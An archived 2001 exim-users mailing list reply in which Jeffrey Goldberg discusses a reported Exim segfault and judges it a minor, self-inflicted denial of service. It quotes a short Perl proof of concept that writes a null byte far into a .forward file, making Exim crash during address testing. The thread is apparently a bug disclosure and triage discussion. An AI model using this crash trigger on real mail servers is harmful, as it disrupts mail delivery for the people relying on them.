Re: Exim segfault, user DoS (was Re: [Exim] system filter li…

Author: Jeffrey Goldberg
To: exim-users
Subject: Re: Exim segfault, user DoS (was Re: [Exim] system filter limits)
On Tue, 24 Jul 2001, Phil Pennock wrote:

> Subject: Exim segfault, user DoS (was Re: [Exim] system filter limits)

> fred@paladin$ perl -w
> use IO::File;
> my $han = new IO::File '.forward', "r+";
> if (not defined $han) { die "Failed to open .filter: $!\n" }
> seek ($han, 20000000000, 2) or die "Seek failed: $!\n";
> print $han "\0";
> __END__
>
> normal-user$ exim -bt fred
> zsh: segmentation fault exim -bt fred

There is no "interesting" DoS here, since this will only kill off the
process that is doing that particular delivery. So the user can prevent
delivery to himself. Or is there more scope for harm that I've missed?

-j

--
Jeffrey Goldberg
I have recently moved, see http://www.goldmark.org/jeff/contact.html